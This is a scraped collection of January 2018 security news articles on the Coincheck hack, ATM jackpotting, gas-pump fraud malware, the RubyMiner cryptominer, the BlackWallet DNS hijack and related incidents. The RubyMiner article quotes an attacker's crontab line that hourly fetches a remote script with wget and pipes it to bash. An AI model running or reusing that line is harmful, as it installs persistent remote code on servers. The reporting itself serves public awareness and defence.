
Coincheck had submitted an application to the FSA for a licence and was allowed to continue operating while it awaited a decision, the agency said.

Japan is a leading market for cryptocurrencies, with nearly a third of global bitcoin transactions in December denominated in yen, according to specialist website jpbitcoin.com.

Virtual currencies are popular elsewhere in Asia, including South Korea and China, but India's government on Thursday said it would crack down on their use.

Finance Minister Arun Jaitley, in his annual budget, said New Delhi would "take all measures to eliminate use of these crypto-assets in financing illegitimate activities or as part of the payment system".

Bitcoin, which soared to nearly $20,000 a unit in December, was down at $8,800 on Friday, while other digital units such as Litecoin and Ethereum have also suffered massive losses from their recent peaks.


ATM Jackpotting Attacks Strike in U.S.
30.1.2018 securityweek Hacking
Hackers have been targeting automated teller machines (ATMs) in the United States to make them spill out cash using an attack technique known as “jackpotting.”

As part of the attacks, individuals with physical access to the machines connect to them and “install malware, or specialized electronics, or a combination of both to control the operations of the ATM,” The United States Secret Service revealed in a warning issued on Friday.

The attackers targeted stand-alone ATMs located in pharmacies, big box retailers, and drive thru ATMs, the alert reads. Both individual suspects and large organized groups (both local and international organized crime syndicates) are engaged in such attacks.

“The Secret Service recently obtained credible information about planned jackpotting attacks in the U.S. through partners of our Electronic Crimes Task Force (ECTF). Subsequently, we alerted other law enforcement partners and financial institutions who could potentially be impacted by this crime,” the Secret Service warning (PDF) reads.

“The two most common ways to implement jackpotting are via Trojans and Blackbox attacks,” Sergey Golovanov, Principal Security Researcher at Kaspersky Lab, explained in an email to SecurityWeek.

When performing jackpotting via Trojans, the attackers connect a flash drive or a CD-ROM to upload the malware to the ATM, or attempt to compromise the machine via the network, Golovanov said.

“The second scenario, Blackbox, assumes that third party equipment (such as a laptop, or raspberry pie) is connected to the cash dispenser, which is responsible for collecting the money and cashing it out to the client,” Golovanov continued.

These and other compromise methods were detailed by Kaspersky Lab researchers in an interview with SecurityWeek at the DefCamp conference in Bucharest late last year.

Specific protection methods exist for both jackpotting attack methods, but ultimately it’s up to the bank to implement them or not, Golovanov said.

Although they have been long observed in Europe and Asia, jackpotting attacks haven’t targeted U.S. ATM operators until earlier this month. As part of the recently observed attacks, miscreants relied on the Blackbox technique to drain the cash from the ATMs.

In addition to the Secret Service, ATM vendors such as NCR and Diebold Nixdorf also sent out alerts last week, security blogger Brian Krebs reported.

“NCR confirms the matters reported by Brian Krebs, and had previously issued its own alert and guidance on this situation. NCR regularly and actively works with our financial solutions customers to address the security and fraud issues that impact this industry,” Owen Wild, security marketing director, NCR, told SecurityWeek via email.

“NCR has received reports from the U.S Secret Service and other sources of logical (jackpot) attacks on ATMs in the US. While at present these appear focused on non-NCR ATMs, logical attacks are an industry-wide issue. This represents the first confirmed cases of losses due to logical attacks in the US,” the company’s last week alert, which was shared with SecurityWeek, reads.

The company also provided guidance on how ATM deployers could protect their machines against these attacks and mitigate any consequences.

SecurityWeek has also contacted Diebold Nixdorf for comment, but haven’t heard back yet.

In the U.S., the attackers appear to be mainly targeting the Opteva 500 and 700 series ATMs from Diebold. With the help of an endoscope, they look inside the cash machine to locate ports to connect a laptop that contains a mirror image of the ATMs operating system, Krebs reports.

The Ploutus.D malware is also said to have been used in these attacks. Ploutus was first discovered in 2013 targeting ATMs in Mexico, and by 2014 it could also be used to withdraw cash using SMS messages.

Ploutus.D was first detailed in January last year, observed as part of attacks where money mules would open the top portion of the ATM, connect to the machine’s internals, and wait for activation codes from the actor in charge of the operation. Mainly targeting Diebold ATMs, the malware could easily be repurposed to hit machines from 40 different vendors in 80 countries.

Even unsophisticated attackers can defraud an ATM, David Vergara, Head of Global Product Marketing, VASCO Data Security, told SecurityWeek in an emailed comment. Anyone can become “a professional thief in this segment with a modest investment in cash,” Vergara says. He also urges banks to look “at and beyond reader devices and hidden cameras” when it comes to securing ATMs.

"With banks’ focus on digital channels, like ATM and mobile, to drive down costs and better serve customers, it’s no surprise that cybercrime is following. The relatively low-tech skimming attacks still represent the vast majority of ATM losses, but more coordinated attacks using physical access to the machine (i.e. master key and keyboard) along with more sophisticated malware are enabling much bigger paydays for hackers,” Vergara said.


Crooks target ATMs with Ploutus-D malware, these are the first confirmed cases of Jackpotting in US
30.1.2018 securityaffairs Hacking

Cybercriminals are targeting ATM machines in the US forcing them to spit out hundreds of dollars with ‘jackpotting‘ attacks.
According to a senior US Secret Service official, the organization has managed to steal more than $1m from ATM machines using this technique.

Once crooks gain physical access to the ATM, they will infect it with a malware or specialized electronics that is designed to instruct the machine to deliver money in response to specific commands.

The jackpotting technique was first proposed by white hat hacker Barnaby Jack in 2010.

Barnaby%20Jack%20Jackpotting%20video

The popular investigator Brian Krebs obtained an alert issued by ATM maker manufacturers Diebold Nixdorf this month, the company warns of an ongoing campaign conducted by a gang in the US.

“On Jan. 21, 2018, KrebsOnSecurity began hearing rumblings about jackpotting attacks, also known as “logical attacks,” hitting U.S. ATM operators. I quickly reached out to ATM giant NCR Corp. to see if they’d heard anything. NCR said at the time it had received unconfirmed reports, but nothing solid yet.” wrote Krebs.

“On Jan. 26, NCR sent an advisory to its customers saying it had received reports from the Secret Service and other sources about jackpotting attacks against ATMs in the United States.”

“While at present these appear focused on non-NCR ATMs, logical attacks are an industry-wide issue,” the NCR alert reads. “This represents the first confirmed cases of losses due to logical attacks in the US. This should be treated as a call to action to take appropriate steps to protect their ATMs against these forms of attack and mitigate any consequences.”

The crooks are infecting the ATM with the Ploutus-D malware, the vendor warns that Opteva 500 and 700 series machines are particularly vulnerable to these attacks.

These attacks are the first confirmed cases of jackpotting attacks against ATMs in the US. Jackpotting attacks were already reported in Europe, in May 27 people have been arrested by the Europol for jackpotting attacks on ATM across many countries in Europe.

Ploutus is one of the sophisticated ATM malware that was first discovered in Mexico back in 2013. The malicious code allows crooks to steal cash from ATMs using either an external keyboard attached to the machine or by sending it SMS messages.

In January, experts at FireEye Labs have discovered a new version of the Ploutus ATM malware, the so-called Ploutus-D, that works the KAL’s Kalignite multivendor ATM platform.

The experts observed the Ploutus-D in attacks against ATM of the vendor Diebold, but the most worrisome aspect of the story is that minor changes to the malware code could allow Ploutus-D to target a wide range of ATM vendors in 80 countries.

Ploutus-D

The alert issued by Secret Service explains that the cybercriminals use an endoscope to inspect the internal parts of the ATM searching for the place where they can attach a cord that allows them to sync their laptop with the ATM’s computer.

endoscope%20jackpotting

Diebold Nixdorf urges the improvement of physical security for ATMs, especially for those located in public places such as malls and pharmacies. Also, tightening the security configuration of the firmware is recommended.

The alert issued by Secret service recommends to limit physical access to the ATM machines and implement protection mechanisms for cash modules (i.e. Use firmware with latest security functionality. use the most secure configuration of encrypted communications incl. physical authentication).


Cryptocurrencies Fall After Hack Hits Japan's Coincheck
27.1.2018 securityweek Hacking

Cryptocurrencies fell Friday after Japan-based digital exchange Coincheck suspended client deposits and withdrawals for virtual currencies except bitcoin, saying it had been hacked.

Coincheck said it was investigating "unauthorised access" of the exchange that appeared to result in a loss worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalisation.

"At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It's worth 58 billion yen based on the calculation at the the rate when detected," said Coincheck's chief operating officer Yusuke Otsuka late Friday.

"We're still examining how many of our customers are affected," he said, adding that the exchange was trying to find out whether the breach was from Japan or another country.

After the exchange suspended deposits and withdrawals, NEM plunged more than 16 percent in a 24-hour period, according to CoinMarketCap.com.

Major virtual currencies had rebounded slightly by late Friday but were still down, with Bitcoin dropping 2.13 percent to $10,987.70, ripple sliding more than six percent and ethereum flat.

Coincheck said it had discovered the breach at 11.25 am and announced it had suspended trading for all cryptocurrencies apart from bitcoin in a series of tweets.

According to its website, which proclaims it is "the leading bitcoin and cryptocurrency exchange in Asia", Tokyo-based Coincheck was founded in 2012 and had 71 employees as of July last year.

In 2014 major Tokyo-based bitcoin exchange MtGox collapsed after admitting that 850,000 coins -- worth around $480 million at the time -- had disappeared from its vaults.

Bitcoin is recognized as legal tender in Japan and nearly one third of global bitcoin transactions in December were denominated in yen, according to specialist website jpbitcoin.com.

The virtual currency is well down from record highs approaching $20,000 in late December, having rocketed 25-fold last year, before being hit by concerns about a bubble and worries about crackdowns on trading it.

Billionaire investor George Soros, known for his legendarily successful currency trading, has dismissed bitcoin as a "typical bubble".

But speaking Thursday at the Davos summit, he said the cryptocurrency would likely avoid a full crash because authoritarians would still use it to make secret investments abroad.


Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked
27.1.2018 securityaffairs Hacking

It is a black Friday for cryptocurrencies, after the news of the hack of the Japan-based digital exchange Coincheck the value of major cryptocurrencies dropped.
It is a black Friday for cryptocurrencies, the news of the hack of the Japan-based digital exchange Coincheck had a significant impact on their value.

Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia.

The Coincheck suspended the operations of deposits and withdrawals for all the virtual currencies except bitcoin, the exchange announced it was investigating an “unauthorised access” to the exchange.

According to the company, the hackers stole worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalization.

The news of the incident has a significant impact on the NEM value that dropped more than 16 percent in 24 hours.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected,”

Coincheck%20hack%20NEM%20Value
NEM Charts – CoinMarketCap.com

The experts at the exchange are investigating the security breach to find out whether it was from Japan or another country.

Coincheck discovered the incident at 11.25 am and notified the suspension of trading for all cryptocurrencies apart from bitcoin via Twitter.


Coincheck
@coincheck_en
We are currently halting deposits, withdrawals, buying and selling of NEM. Please accept our sincere apologies for this inconvenience and rest assured that we are working to resolve this issue as quickly as possible.https://coincheck.com/en/blog/4673

5:04 AM - Jan 26, 2018

*Urgent update regarding deposits of NEM* | Coincheck Cryptocurrency Exchange
View the latest news today for bitcoin market in Japan, cryptocurrency, new features, and campaign at Coincheck Blog.

coincheck.com

Twitter Ads info and privacy
In February 2014, Mt. Gox suspended trading and filed for bankruptcy protection from creditors.

At the time, the company was handling over 70% of all bitcoin transactions worldwide, it announced that approximately 850,000 bitcoins ($450 million at the time) belonging to customers and the company were stolen.


Hacker infected pumps at gas-stations in Russia in a profitable fraud scheme
22.1.2018 securityaffairs Hacking

Authorities discovered a fraudulent scheme involving dozens of gas-station employees who installed malicious programs on electronic gas pumps to cheat customers
Russian law enforcement investigated fraudulent activities involving gas-station payment systems.

Authorities discovered a fraudulent scheme involving dozens of gas-station employees who installed malicious programs on electronic gas pumps to trick customers into paying for more fuel than they pumped into their vehicles.

The software allows gas-station employees to deliver between 3 to 7 percent less per gallon of pumped gas.

The scam shorted customers between 3-to-7 percent per gallon of gas pumped.

“At dozens of gas stations owned by the largest oil companies, FSB officers identified malicious computer programs, thanks to which the owners of cars quietly missed the fuel. At times, “underweight” was up to 7% of the amount of gasoline that was being refueled into the tank. Identify the virus was almost impossible. Their creator and distributor was detained.” reported media outlet Rosbalt.

On Saturday, Russian Federal Security Service (FSB) arrested the hacker Denis Zayev. The man was charged with the creation of several programs designed for such kind of frauds.

Authorities revealed that the programs were found only on gas stations in the south of the country.

According to the authorities, the man was selling the software to gas-station employees. involved in the fraud scheme. Zayev was sharing profits with gas-station employees, it has been estimated that the fraud allowed the hacker and employees to earn “hundreds of millions of rubles.”

The malicious software was undetectable by inspectors and oil companies that monitor gasoline inventory remotely.

“At dozens of gas stations, malicious programs were discovered, which made it unnoticeable for customers to undercharge fuel when refueling their cars. “A giant scam covered almost the entire south of Russia,” viruses “were found in dozens of gas stations in the Stavropol Territory, Adygea, Krasnodar Territory, Kalmykia, several republics of the North Caucasus, etc.” continues the Rosbalt.”A whole network was built to steal fuel from ordinary citizens – they did not bear any financial loss, “the source said. “

Zaiev’s software was very sophisticated programs that were injected both into the software of the pumps and into the cash register to modify records.

The Rosbalt provided details about the way the programs worked. Every morning, gas-station employees left one of the reservoirs empty (for example, under the guise of maintenance). When a customer made a purchase, the software automatically undercharged him from 3% to 7% of the amount of gasoline purchased. The meter on the column was instructed to display the clients to show that the entire volume of paid fuel was poured into the tank. The stolen gasoline was automatically sent to the tank left empty. The malware virus erased any track of this operation.

The fuel was collected in the tank to be sold later by scammers that shared the profits of the sale.

Vulnerabilities and cyber attacks involving systems at gas-stations are not a novelty.

In January 2014, a criminal organization hit gas station ATMs located in South America. The gang used Bluetooth-enabled skimmers to steal 2 million dollars from customers.

Early 2015, experts at Rapid7 revealed that more than 5000 Automated tank gauges (ATGs) used to prevent fuel leaks at gas stations in US were vulnerable to remote cyber attacks.
gas-stations


RubyMiner Monero Cryptominer affected 30% of networks worldwide in just 24h
18.1.2018 securityaffairs  Hacking

Security researchers at Check Point have spotted a malware family dubbed RubyMiner that is targeting web servers worldwide in an attempt to exploit their resources to mine Monero cryptocurrency.
RubyMiner, was first spotted last week when a massive campaign targeted web servers worldwide, most of them in the United States, Germany, United Kingdom, Norway, and Sweden.

The experts believe that a single lone attacker is behind the attacks, in just one day he attempted to compromise nearly one-third of networks globally.

“In the last 24 hours, 30% of networks worldwide have experienced compromise attempts by a crypto-miner targeting web servers.” read the analysis from Check Point.

“During that period, the lone attacker attempted to exploit 30% of all networks worldwide to find vulnerable web servers in order to mobilize them to his mining pool. Among the top countries targeted are the United States, Germany, United Kingdom, Norway and Sweden, though no country has gone unscathed.”

RubyMiner

The malware targets both Windows and Linux servers, attempting to exploit old vulnerabilities in PHP, Microsoft IIS, and Ruby on Rails to deploy the Monero miner.

The Italian security firm Certego noticed the same attacks that began on January 10.

“Our threat intelligence platform has been logging a huge spike in ruby http exploiting since yesterday (10 January) at 23:00.” states the report published by Certego.

“The exploit has been trying to leverage a fairly old CVE (CVE-2013-0156) that allows remote code execution. The following public Emerging Threat signature cover the exploit:”

The attack doesn’t appear very sophisticated, the hacker did not attempt to conceal his operations, but it was focused on infecting the larger number of servers in the shortest time.

“Surprisingly, by using old vulnerabilities published and patched in 2012 and 2013, it doesn’t seem that stealth was part of the attacker’s agenda either. Instead, the attacker chose to exploit multiple vulnerabilities in HTTP web servers, to distribute an open source Monero miner – XMRig.” continues the analysis.

“In fact, XMRig usually sends a donation of 5% of the revenue gained from the mining process to the code’s author. However, even this amount was too much for the attacker to part with as that ‘donation element’ was deleted from the code, giving the enthusiast 100% of the profit.”

At the time of the report, only 700 servers worldwide have been successfully compromised in the first 24 hours of attacks.

The experts from Certego observed the attacker exploiting the CVE-2013-0156 remote code execution flaw in Ruby on Rails.

The attacker sends a base64 encoded payload inside a POST request in the attempt to trick the interpreter into executing it.

The malicious payload is a bash script that adds a cronjob that runs every hour and downloads a robots.txt file containing a shell script, used to fetch and execute the cryptominer. The scheduler is being told to run the whole process, including downloading the file from the server every hour.

“The cron is a UNIX based scheduler which allows running scheduled tasks at fixed times via its own syntax. Running the crontab command with the –r argument will remove all existing tasks in the existing crontab and allow for the miner to take full priority.” continues the analysis from Checkpoint.

echo “1 * * * * wget -q -O – http://internetresearch.is/robots.txt 2>/dev/null|bash >/dev/null 2>&1″|crontab –
“Now the attacker can inject the new job to the clean crontab file using the “1 * * * *” which will tell the scheduler to run once an hour for one minute infinitely.

The new job will download and execute the “robots.txt” file hosted on “internetresearch.is.” and the mining process can begin.”

Experts believe that the robots.txt file could be used also as a kill switch for RubyMiner, modify the robots.txt file on the compromised webserver it is possible to deactivate the malware.

“Within a minute, all the machines re-downloading the file will be receiving files without the crypto miners,” Check Point notes.

The expert noticed that one of the domains used by the attacker, lochjol.com, was involved in an attack that abused the Ruby on Rails vulnerability in 2013.

Check Point researchers also published the IoC related to RubyMiner.


Blackwallet hacked, hackers stole $400,000 from users’ accounts through DNS hijacking
17.1.2018 securityaffairs Hacking

BlackWallet.co was victims of a DNS hijacking attack, on January 13 the attackers have stolen over $400,000 from users’ accounts (roughly 670,000 Lumens).
The spike in cryptocurrency values is attracting cybercriminals, the last victim is the BlackWallet.co a web-based wallet application for the Stellar Lumen cryptocurrency (XLM).

The platform was victims of a DNS hijacking attack, on January 13 the attackers have stolen over $400,000 from users’ accounts (roughly 670,000 Lumens).

According to Bleeping Computer, the attackers collected 669,920 Lumens, which is about $400,192 at the current XML/USD exchange rate.

Stellar Lumen today is considered as the eight most popular cryptocurrency.

The attackers hijacked the DNS entry of the BlackWallet.co domain and redirected it to a server they operated, as result of the attack, the application suspended its service.

Technically users were logging to the bogus domain entering their credentials, then the attackers used them to access the account and steal the funds.



Kevin Beaumont

@GossiTheDog
Blackwallet (web wallet) has apparently been hacked

2:51 AM - Jan 14, 2018
5 5 Replies 98 98 Retweets 83 83 likes
Twitter Ads info and privacy
14 Jan

Kevin Beaumont

@GossiTheDog
Blackwallet (web wallet) has apparently been hacked pic.twitter.com/HhewwBXnD9


Kevin Beaumont

@GossiTheDog
The DNS hijack of Blackwallet injected code, if you had over 20 Lumens it pushes them to a different wallet. pic.twitter.com/Eiwb8UR1Nn

2:58 AM - Jan 14, 2018
View image on Twitter
4 4 Replies 32 32 Retweets 34 34 likes
View%20image%20on%20Twitter

Well I know now why XLM is dipping

Blackwallet got hacked and the worst part was that I laughed my ass off when reading the reddit…their misery is my gain and for a moment, I felt nothing but joy.

Okay maybe there's something wrong with me.

— Colton Miles (@Omgflamethrower) January 14, 2018

Users on Reddit and other communities promptly spread the news of the hack.

The attackers immediately started moving funds from the XLM account to Bittrex, a cryptocurrency exchange, in the attempt to launder them by converting in other digital currency.

blackwallet%20hacked

The situation is critical, admins are asking Bittrex to block the attackers’ operations before is too late.

“I am the creator of Blackwallet. Blackwallet was compromised today, after someone accessed my hosting provider account. He then changed the dns settings to those of its fraudulent website (which was a copy of blackwallet).” the Blackwallet creator wrote on Reddit.

“Hacker wallet is: https://stellarchain.io/address/GBH4TZYZ4IRCPO44CBOLFUHULU2WGALXTAVESQA6432MBJMABBB4GIYI

I’ve contacted both SDF and Bittrex to ask them to block the bittrex’s account of the hacker. I’ve contacted my hosting provider to disable my account and my websites.

Hacker sent the funds to a bittrex account. This might lead to an identity.”


orbit84
@orbit0x54
Hello @BittrexExchange , please block the account with MEMO XLM 27f9a3e4d954449da04, he hacked https://blackwallet.co/ and is now sending all the funds to your exchange! This is URGENT! A lot of money is involved (>$300,000) https://stellarchain.io/address/GBH4TZYZ4IRCPO44CBOLFUHULU2WGALXTAVESQA6432MBJMABBB4GIYI … https://www.reddit.com/r/Stellar/comments/7q72pw/warning_blackwalletco_hacked_check_your_public_key/?sort=new …

3:35 AM - Jan 14, 2018
11 11 Replies 108 108 Retweets 63 63 likes
Twitter Ads info and privacy
According to the BlackWallet admin, the incident took place after someone accessed his hosting provider account.

The creator of the web-based wallet application is trying to collect more info about the hack from his hosting provider.

“If you ever entered your key on blackwallet, you may want to move your funds to a new wallet using the stellar account viewer,” he added. “Please note however that blackwallet was only an account viewer and that no keys were stored on the server!” he added in the statement.

In December, the popular cryptocurrency exchange EtherDelta suffered a similar incident, attackers conducted a DNS attack that allowed to steal at least 308 ETH ($266,789) as well as a large number of tokens.


Canadian man charged over leak of billions hacked accounts through LeakedSource
17.1.2018 securityaffairs Hacking

A Canadian Man supposed to be the admin of the LeakedSource.com website was charged over the leak of 3 billion hacked accounts.
The Canadian man Jordan Evan Bloom (27) was charged with data leak of 3 billion hacked accounts, the man was running a website to collect personal data and login credentials from the victims.

The man was charged in December as part of an investigation dubbed “Project Adoration,” aiming at trafficking in personal data, unauthorized use of computers, and possession of an illicitly obtained property.

The RCMP alleges that Bloom was the administrators of the LeakedSource.com website.

According to a statement from the Royal Canadian Mounted Police, “Project Adoration” began in 2016, the investigation started after the Canadian police learned that LeakedSource.com was being hosted by servers located in Quebec.

The RCMP conducted the investigation along with The Dutch National Police and the FBI.

According to the Royal Canadian Mounted Police, Evan Bloom earned some 247,000 Canadian dollars (roughly $198,800 US) by selling the data via leakedsource.com.

“This investigation is related to claims about a website operator alleged to have made hundreds of thousands of dollars selling personal information,” said Rafael Alvarado, the officer in charge of the RCMP Cybercrime Investigative Team. “The RCMP will continue to work diligently with our domestic and international law enforcement partners to prosecute online criminality.”

The data was stolen during massive data breaches of popular websites such as LinkedIn and Ashley Madison online dating service.


Clearly, the availability of such kind of data exposes users at risk of identity theft especially if they share the same credentials on differed web services.

Law enforcement shut down Bloom’s website, unfortunately, another domain name operated by the man is still operating because it hosted on bulletproof servers in Russia.


Canadian Man Charged Over Leak of Three Billion Hacked Accounts
17.1.2018 securityweek Hacking

An Ontario man made his first court appearance Monday to answer charges of running a website that collected personal and password data from some three billion accounts, and sold them for profit.

Jordan Evan Bloom, 27, of Thornhill earned some Can$247,000 ($198,800 US) by selling the data for a "small fee" via leakedsource.com, the Royal Canadian Mounted Police said in a statement.

The information was stolen during massive hacks of websites including LinkedIn and the Ashley Madison online dating service.

Some of the data could also be used to access other popular websites if the hacked user used the same password and username combination, according to police.

Bloom was charged in December as part of a criminal probe dubbed "Project Adoration" focusing on trafficking in personal data, unauthorized use of computers, and possession of illicitly obtained property.

The probe lasted more than a year.

Authorities have shut down Bloom's website, but another with the same domain name hosted by servers in Russia is still operating.

"The RCMP will continue to work diligently with our domestic and international law enforcement partners to prosecute online criminality," inspector Rafael Alvarado said in a statement.

Police noted that help from the Dutch National Police and the FBI were "essential" to the investigation.


Hackers Leak Olympic Committee Emails in Response to Russia Ban
11.1.2018 securityweek Hacking
A group of hackers linked to Russia has leaked several emails apparently exchanged between officials of the International Olympic Committee (IOC) and other individuals involved with the Olympics. The leak comes in response to Russia being banned from the upcoming Pyeongchang 2018 Winter Games in South Korea.

The group, calling itself Fancy Bears and claiming to be a team of hacktivists that “stand for fair play and clean sport,” previously released confidential athlete medical records stolen from the systems of the World Anti-Doping Agency (WADA), and also targeted the International Association of Athletics Federations (IAAF). One of their most recent leaks included emails and medical records related to football (soccer) players who used illegal substances.

The first leaks from Fancy Bears came shortly after Russian athletes were banned from the 2016 Rio Olympics following reports that Russia had been operating a state-sponsored doping program.

While Fancy Bears claim to be hacktivists, researchers have found ties between the group and Fancy Bear, a sophisticated Russian cyber espionage team also known as APT28, Pawn Storm, Sednit, Sofacy, Tsar Team and Strontium.

The latest leak includes emails apparently exchanged between IOC officials and other individuals involved with the Olympics. Some of the messages discuss the recent decision to ban Russia from the upcoming Winter Games based on the findings of the IOC Disciplinary Commission.

“These emails and documents point to the fact that the Europeans and the Anglo-Saxons are fighting for power and cash in the sports world. WADA headquartered in Montreal, Canada supported by the United States Olympic Committee declared the crusade against the IOC on the pretext of defending clean sport,” the hackers said. “However, the genuine intentions of the coalition headed by the Anglo-Saxons are much less noble than a war against doping. It is apparent that the Americans and the Canadians are eager to remove the Europeans from the leadership in the Olympic movement and to achieve political dominance of the English-speaking nations.”

While the hackers claim the emails they leaked prove the accusations, a majority of the messages don’t appear to contain anything critical. Furthermore, Olympics-related organizations whose systems were previously breached by the hackers claimed at the time that some of the leaked files had been doctored.

WADA representatives told Wired that Fancy Bears are looking to “undermine the work of WADA and others,” and claimed that everything they leaked this week is “dated.” WADA officially accused Russia of being behind previous attacks.

It’s unclear how the emails have been obtained by the hackers, but the group has been known to launch phishing attacks involving fake WADA domains. It’s possible that they tricked some of the individuals whose emails have been compromised into handing over their credentials on a phishing site.

Russia has been accused by several experts of disguising some of its cyber campaigns as hacktivism. For instance, a hacker using the moniker Guccifer 2.0 has taken credit for an attack on the U.S. Democratic Party, which may have influenced last year’s presidential election.

Many believe the Fancy Bears attacks are Russia’s response to its athletes being banned. Perhaps unsurprisingly, articles from two major pro-Russia English-language news organizations suggest that the latest leak from Fancy Bears shows that Russia’s exclusion from the Olympics was politically motivated.

Security firm McAfee reported last week that several organizations associated with the Olympics had received emails set up to deliver information-stealing malware, but it’s unclear who is behind the attacks.


Experts spotted Monero cryptominer sending currency to North Korean University
9.1.2018 securityaffairs Hacking

Security researchers at AlienVault labs recently analyzed an application compiled on Christmas Eve 2017 that is an installer for a Monero cryptocurrency miner.
The mined Monero coins are sent to Kim Il Sung University in Pyongyang, North Korea, but experts noted that the developers might not be of North Korean origins.

The KSU is an unusually open University, it is attended by a number of foreign students and lecturers.

The researchers speculate the application could either be an experimental software or could be a prank to trick security researchers by connecting to Kim Il Sung University in Pyongyang, North Korea.

Monero miner North Korea

Once executed, it copies a file named intelservice.exe to the system, this is the Monero cryptocurrency mining malware.

“The filename intelservice.exe is often associated with crypto-currency mining malware. Based on the arguments it’s executed with, it’s likely a piece of software called xmrig.” reads the analysis published by AlienVault.

“It’s not unusual to see xmrig in malware campaigns. It was recently used in some wide campaignsexploiting unpatched IIS servers to mine Monero.”

The experts determined that it is a piece of software called xmrig by observing the arguments the file is executed with.

Analyzing the file the researchers discovered both the address of the Monero wallet and the password used that is “KJU”, a possible reference to Kim Jong-un.

The mined currency is sent to the server barjuok.ryongnamsan.edu.kp server located at Kim Il Sung University.

The address barjuok.ryongnamsan.edu.kp address doesn’t currently resolve, either because the app was designed to run on the university’s network, or because it was no longer in use.

“It’s not clear if we’re looking at an early test of an attack, or part of a ‘legitimate’ mining operation where the owners of the hardware are aware of the mining.” continues the analysis.

“On the one hand the sample contains obvious messages printed for debugging that an attacker would avoid. But it also contains fake filenames that appear to be an attempt to avoid detection of the installed mining software.”

Security experts pointed out that North Korea-linked group Lazarus was already involved in attacks involving cryptocurrencies.

In December, security experts from Secureworks revealed the Lazarus APT group launched a spearphishing campaign against a London cryptocurrency company.

The attacks focused on Monero conducted by North Korean threat actors were associated with Bluenorroff and Andariel hackers, who are considered as being part of the Lazarus group. Researchers from AlienVault highlighted that they haven’t discovered evidence to link the newly found Installer to any attacks attributed to Lazarus.

“We have not identified anything linking our Installer to these attacks. The Lazarus attackers have capable developers, and craft their own malware from a library of low-level code.” concluded the research. “Given the amateur usage of Visual Basic programming in the Installer we analysed, it’s unlikely the author is part of Lazarus. As the mining server is located in a university, we may be looking at a university project.”

Experts also made another hypothesis, someone inside the University developed the project to test the use of cryptocurrency in a country hit hard by sanctions.


BlackBerry Mobile Website hacked, crooks installed a Coinhive’s code to mine Monero
8.1.2018 securityaffairs Hacking

According to Coinhive, the BlackBerry Mobile website was hacked by exploiting a critical security vulnerability in the Magento e-commerce software.
The spike in the value of some cryptocurrencies like Bitcoin is attracting the interest of cyber criminals. The numbers of incidents and cyber attacks involving miners and mining scripts continue to increase and the last in order of time seems to be the BlackBerry Mobile Site.

On January 6, a Reddit user that handle the moniker “Rundvleeskroket” claims that the official website of BlackBerry Mobile was caught using Coinhive’s cryprocurrency code to mine Monero. Rundvleeskroket wrote that his friend pointed out that Blackberry Mobile domain (blackberrymobile.com) was using the Coinhive code,

“A friend of mine just pointed this out to me.
Have a look at the source code on their pages. This is an official site where BB links to themselves from their product pages at blackberry.com.

Image.” he wrote.

Originally pointed out by /u/cryptocripples on /r/security

Update: it seems like only their global site is affected. So anyone getting redirected to CA, EU, US, etc won’t have the coinhive miner running while the site is open.”

The Reddit user also shared the following screenshot:

coinhive%20script%20blackberry%20mobile

The Coinhive code was removed from the BlackBerry mobile site, unfortunately, such kind of incidents is becoming frequent. In many cases, website owners are using the CoinHive code to generate Monero exploiting computational resources of unaware visitors.

In December experts from Sucuri discovered that nearly 5,500 WordPress websites were infected with a malicious script that logs keystrokes and in loads a cryptocurrency miner in the visitors’ browsers.

In November, experts reported the same attackers were loading malicious scripts disguised as fake jQuery and Google Analytics JavaScript files that were actually a copy of the Coinhive in-browser cryptocurrency miner. By November 22, the experts observed 1,833 sites compromised by the attackers.

According to a Coinhive’s comment on the Reddit post, the BlackBerry Mobile website was hacked by exploiting a critical security vulnerability in the Magento ecommerce software.

According to Coinhive, the same Coinhive’s account was used in the hack of many other websites, for this reason, it was suspended.

“Coinhive here. We’re sorry to hear that our service has been misused. This specific user seems to have exploited a security issue in the Magento web shop software (and possibly others) and hacked a number of different sites. We have terminated the account in question for violating our terms of service now.” commented Coinhive.


Monero Miner Sends Cryptocurrency to North Korean University
8.1.2018 securityweek Hacking
An application compiled just weeks ago was found to be an installer for a Monero miner designed to send the mined currency to a North Korean university, AlienVault reports.

The application’s developers, however, might not be of North Korean origins themselves, the security researchers say. They also suggest that the tool could either be only an experimental application or could attempt to trick researchers by connecting to Kim Il Sung University in Pyongyang, North Korea.

Once the discovered installer is run, it copies a file named intelservice.exe to the system, which is often associated with cryptocurrency mining malware. The arguments the file is executed with reveal it is a piece of software called xmrig, a program already associated with wide campaigns exploiting unpatched IIS servers to mine Monero.

Analysis of the file revealed both the address of the Monero wallet and the password (KJU, possible reference to Kim Jong-un) it uses, as well as the fact that it sends the mined currency to the server barjuok.ryongnamsan.edu.kp server. The use of this domain reveals that the server is located at Kim Il Sung University, AlienVault says.

AlienVault's security researchers also discovered that the specified address doesn’t resolve, either because the app was designed to run on the university’s network, because the address used to resolve in the past, or because it is only meant to trick security researchers.

“It’s not clear if we’re looking at an early test of an attack, or part of a ‘legitimate’ mining operation where the owners of the hardware are aware of the mining,” AlienVault says.

The sample was also found to contain obvious messages printed for debugging as well as fake filenames meant to avoid detection. According to the researchers, if the software author is at the Kim Il Sung University, they might not be North Korean.

“KSU is an unusually open University, and has a number of foreign students and lecturers,” the researchers explain.

North Korean attacks focused on Monero mining have been spotted before, such as those associated with Bluenorroff and Andariel hackers, who are generally considered as being part of the Lazarus group. However, AlienVault hasn’t discovered evidence to link the newly found installer to the previous attacks.

“The Lazarus attackers have capable developers, and craft their own malware from a library of low-level code. Given the amateur usage of Visual Basic programming in the Installer we analyzed, it’s unlikely the author is part of Lazarus. As the mining server is located in a university, we may be looking at a university project,” the researchers note.

On the other hand, with the country hit hard by sanctions, crypto-currencies could easily prove highly valuable resources, and a North Korean university’s interest in the area wouldn’t be surprising.

In fact, the Pyongyang University of Science and Technology recently invited foreign experts to lecture on crypto-currencies, and the recently discovered installer might be a product of their endeavors, AlienVault suggests.


Hackers Already Targeting Pyeongchang Olympics: Researchers
7.1.2018 securityweek Hacking
